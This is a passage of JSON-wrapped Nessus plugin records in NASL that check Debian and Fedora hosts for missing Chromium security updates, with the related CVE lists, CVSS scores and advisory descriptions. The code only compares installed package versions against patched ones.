attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13750\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13757\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13767\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4606\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), security support for\nchromium has been discontinued.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 79.0.3945.130-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:08:18", "description": "Update to 80.0.3987.132. Lots of security fixes here. 
VAAPI re-enabled by default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-20T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2020-f6271d7afa)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20446", "CVE-2020-10531", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2020-F6271D7AFA.NASL", "href": "https://www.tenable.com/plugins/nessus/134718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-f6271d7afa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134718);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-20446\", \"CVE-2020-10531\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", 
\"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6417\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"FEDORA\", value:\"2020-f6271d7afa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Fedora 31 : chromium (2020-f6271d7afa)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled\nby default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly 
from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-f6271d7afa\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-80.0.3987.132-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:08:19", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-19880 Richard Lorenz discovered an issue in the sqlite library.\n\n - CVE-2019-19923 Richard Lorenz discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-19925 Richard Lorenz discovered an issue in the sqlite library.\n\n - CVE-2019-19926 Richard 
Lorenz discovered an implementation error in the sqlite library.\n\n - CVE-2020-6381 UK's National Cyber Security Centre discovered an integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382 Soyeon Park and Wen Xu discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6383 Sergei Glazunov discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6384 David Manoucheri discovered a use-after-free issue in WebAudio.\n\n - CVE-2020-6385 Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386 Zhe Jin discovered a use-after-free issue in speech processing.\n\n - CVE-2020-6387 Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC implementation.\n\n - CVE-2020-6388 Sergei Glazunov discovered an out-of-bounds read error in the WebRTC implementation.\n\n - CVE-2020-6389 Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC implementation.\n\n - CVE-2020-6390 Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391 Michal Bentkowski discoverd that untrusted input was insufficiently validated.\n\n - CVE-2020-6392 The Microsoft Edge Team discovered a policy enforcement error.\n\n - CVE-2020-6393 Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394 Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395 Pierre Langlois discovered an out-of-bounds read error in the v8 JavaScript library.\n\n - CVE-2020-6396 William Luc Ritchie discovered an error in the skia library.\n\n - CVE-2020-6397 Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398 pdknsk discovered an uninitialized variable in the pdfium library.\n\n - CVE-2020-6399 Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400 Takashi Yoneuchi discovered an error in Cross-Origin Resource Sharing.\n\n - CVE-2020-6401 Tzachy Horesh discovered that user input was insufficiently validated.\n\n - CVE-2020-6402 Vladimir Metnew discovered a policy 
enforcement error.\n\n - CVE-2020-6403 Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404 kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405 Yongheng Chen and Rui Zhong discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2020-6406 Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407 Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408 Zhong Zhaochen discovered a policy enforcement error in Cross-Origin Resource Sharing.\n\n - CVE-2020-6409 Divagar S and Bharathi V discovered an error in the omnibox implementation.\n\n - CVE-2020-6410 evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411 Khalil Zhani discovered that user input was insufficiently validated.\n\n - CVE-2020-6412 Zihan Zheng discovered that user input was insufficiently validated.\n\n - CVE-2020-6413 Michal Bentkowski discovered an error in Blink/Webkit.\n\n - CVE-2020-6414 Lijo A.T discovered a policy safe browsing policy enforcement error.\n\n - CVE-2020-6415 Avihay Cohen discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2020-6416 Woojin Oh discovered that untrusted input was insufficiently validated.\n\n - CVE-2020-6418 Clement Lecigne discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6420 Taras Uzdenov discovered a policy enforcement error.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-12T00:00:00", "type": "nessus", "title": "Debian DSA-4638-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19925", "CVE-2019-19926", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4638.NASL", "href": "https://www.tenable.com/plugins/nessus/134433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4638. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134433);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-19880\", \"CVE-2019-19923\", \"CVE-2019-19925\", \"CVE-2019-19926\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"DSA\", value:\"4638\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Debian DSA-4638-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-19880\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - CVE-2019-19923\n Richard Lorenz discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-19925\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - 
CVE-2019-19926\n Richard Lorenz discovered an implementation error in the\n sqlite library.\n\n - CVE-2020-6381\n UK's National Cyber Security Centre discovered an\n integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382\n Soyeon Park and Wen Xu discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6383\n Sergei Glazunov discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6384\n David Manoucheri discovered a use-after-free issue in\n WebAudio.\n\n - CVE-2020-6385\n Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386\n Zhe Jin discovered a use-after-free issue in speech\n processing.\n\n - CVE-2020-6387\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6388\n Sergei Glazunov discovered an out-of-bounds read error\n in the WebRTC implementation.\n\n - CVE-2020-6389\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6390\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391\n Michal Bentkowski discoverd that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6392\n The Microsoft Edge Team discovered a policy enforcement\n error.\n\n - CVE-2020-6393\n Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394\n Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395\n Pierre Langlois discovered an out-of-bounds read error\n in the v8 JavaScript library.\n\n - CVE-2020-6396\n William Luc Ritchie discovered an error in the skia\n library.\n\n - CVE-2020-6397\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398\n pdknsk discovered an uninitialized variable in the\n pdfium library.\n\n - CVE-2020-6399\n Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400\n Takashi Yoneuchi discovered an error in Cross-Origin\n Resource Sharing.\n\n - CVE-2020-6401\n Tzachy Horesh discovered that user 
input was\n insufficiently validated.\n\n - CVE-2020-6402\n Vladimir Metnew discovered a policy enforcement error.\n\n - CVE-2020-6403\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404\n kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405\n Yongheng Chen and Rui Zhong discovered an out-of-bounds\n read issue in the sqlite library.\n\n - CVE-2020-6406\n Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408\n Zhong Zhaochen discovered a policy enforcement error in\n Cross-Origin Resource Sharing.\n\n - CVE-2020-6409\n Divagar S and Bharathi V discovered an error in the\n omnibox implementation.\n\n - CVE-2020-6410\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411\n Khalil Zhani discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6412\n Zihan Zheng discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6413\n Michal Bentkowski discovered an error in Blink/Webkit.\n\n - CVE-2020-6414\n Lijo A.T discovered a policy safe browsing policy\n enforcement error.\n\n - CVE-2020-6415\n Avihay Cohen discovered an implementation error in the\n v8 JavaScript library.\n\n - CVE-2020-6416\n Woojin Oh discovered that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6418\n Clement Lecigne discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6420\n Taras Uzdenov discovered a policy enforcement error.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2019-19926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 